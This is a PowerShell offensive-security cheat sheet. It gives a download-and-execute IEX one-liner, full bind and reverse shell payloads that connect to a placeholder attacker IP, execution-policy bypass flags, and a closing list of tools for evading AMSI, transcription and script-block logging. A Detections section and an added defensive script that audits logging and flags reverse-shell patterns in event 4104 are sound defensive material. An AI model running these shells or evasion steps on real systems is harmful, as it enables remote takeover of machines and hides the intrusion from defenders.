General PowerShell
Version & Execution Policies
The execution policy controls the conditions under which PowerShell loads configuration files and runs scripts.
#Get current PowerShell version
$PSVersionTable.PSVersion
#Get effective execution policy
Get-ExecutionPolicy
#Get all execution policies that affect the current session
Get-ExecutionPolicy -List
#Change execution policy
Set-ExecutionPolicy <Bypass,Unrestricted,etc.>
#Launch PowerShell with a given execution policy
powershell.exe -ep <Bypass,Unrestricted,etc.>

Modules & Scripts
Modules: A package that contains PowerShell members, such as cmdlets, providers, functions, workflows, variables, and aliases. PSM1 and PSD1 extensions.
Scripts: A file containing one or more commands or functions. PS1 extension.
#Load a script using dot-sourcing
. C:\path_to_script.ps1
#Import a module
Import-Module C:\Path_To_File.psd1/psm1
#Get imported modules
Get-Module
#Get commands
Get-Command -Module '<module_name>'

File Transfers & Executions
#Download a file
powershell -c "(new-object System.Net.WebClient).DownloadFile('http…/path/','local_path_to_save_file.ext')"
#Execute a file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
#Download and execute a file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile IEX (New-Object System.Net.WebClient).DownloadString('http://../file.ps1')

Bind and Reverse Shell Payloads (Unencrypted)
#Bind Shell Payload
powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',<PORT_TO_LISTEN>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();$listener.Stop()"
#Reverse Shell
powershell.exe -c "$client = New-Object System.Net.Sockets.TcpClient('<IP_to_CONNECT>',<PORT_TO_CONNECT>); $stream = $client.GetStream(); [byte[]]$bytes=0..65535|%{0}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close();"

Detections
System-Wide Transcription: All commands and output are locally logged
Script-Block Logging: Records blocks of code as they are executed by PowerShell
Warning Level: Script blocks that match a built-in list of known-suspicious keywords are logged at Warning level. Enabled on Windows 8.1 onwards.
Verbose: Everything is logged
Anti-Malware Scan Interface (AMSI): Passes script content to the installed Windows AV at run time for a static, signature-based check on that partial script.
Constrained Language Mode (CLM): Restricts the PowerShell language features (such as arbitrary .NET type and method access) available to tools that are not Microsoft-signed.
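As an added example that is not part of the original cheat sheet, the script below serves both the payload section above and the Detections list: it audits the logging and hardening controls on the local host, then reviews recent script-block events (ID 4104 in Microsoft-Windows-PowerShell/Operational) for the traces the one-liners above leave behind. It assumes the standard Group Policy registry locations under HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell and an elevated session; the Test-SuspiciousScriptBlock function and its patterns are this example's own, not a Microsoft API.

```powershell
# Added example (not from the original cheat sheet): audit the controls listed
# under Detections, then review recent script-block events for the patterns
# the payloads on this page leave behind. Registry paths are the standard
# Group Policy locations; run in an elevated session.

$policyBase = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Get-PolicyValue {
    param([string]$SubKey, [string]$Name)
    $item = Get-ItemProperty -Path (Join-Path $policyBase $SubKey) -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

# 1. Logging / hardening posture of this host
$audit = [ordered]@{
    'PowerShell version'           = $PSVersionTable.PSVersion.ToString()
    'Execution policy (effective)' = (Get-ExecutionPolicy).ToString()
    'Language mode'                = $ExecutionContext.SessionState.LanguageMode.ToString()
    'Script-block logging enabled' = ((Get-PolicyValue 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1)
    'Module logging enabled'       = ((Get-PolicyValue 'ModuleLogging' 'EnableModuleLogging') -eq 1)
    'Transcription enabled'        = ((Get-PolicyValue 'Transcription' 'EnableTranscripting') -eq 1)
    'Transcript directory'         = (Get-PolicyValue 'Transcription' 'OutputDirectory')
}
[pscustomobject]$audit | Format-List

# 2. Indicators derived from the one-liners on this page (hypothetical helper).
#    A block is flagged when it opens a TCP socket and evaluates what it reads,
#    or when it downloads remote content and evaluates it. -match is
#    case-insensitive, so IEX / iex / Invoke-Expression are all covered.
function Test-SuspiciousScriptBlock {
    param([string]$Text)
    $socket   = ($Text -match 'System\.Net\.Sockets\.Tcp(Client|Listener)') -and ($Text -match '\.GetStream\(\)')
    $evaluate = $Text -match '\b(iex|Invoke-Expression)\b'
    $download = $Text -match '\.Download(String|File)\('
    return ($socket -and $evaluate) -or ($download -and $evaluate)
}

# 3. Script-block events from the last 24 hours. Level 3 (Warning) entries are
#    the ones that matched PowerShell's built-in suspicious-keyword list;
#    Properties[2] of a 4104 event is the ScriptBlockText field.
$filter = @{
    LogName   = 'Microsoft-Windows-PowerShell/Operational'
    Id        = 4104
    StartTime = (Get-Date).AddDays(-1)
}
Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
    ForEach-Object {
        $block = [string]$_.Properties[2].Value
        [pscustomobject]@{
            TimeCreated  = $_.TimeCreated
            WarningLevel = ($_.Level -eq 3)
            Flagged      = (Test-SuspiciousScriptBlock -Text $block)
            Preview      = $block.Substring(0, [Math]::Min(120, $block.Length))
        }
    } |
    Where-Object { $_.Flagged -or $_.WarningLevel } |
    Format-Table -AutoSize -Wrap
```

If script-block logging is not enabled, the 4104 query only returns the Warning-level blocks that PowerShell logs on its own, so the first half of the output (the audit) tells you how much visibility the second half can actually have.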
Bypassing Detections (Windows Defender)
AMSITrigger: Identifies the strings in a PowerShell file that AMSI flags as malicious.
Invoke-Obfuscation: A PowerShell command and script obfuscator.
Invisi-Shell: Starts a new PowerShell session bypassing System-Wide Transcription, Script-Block Logging, and Anti-malware Scan Interface (AMSI).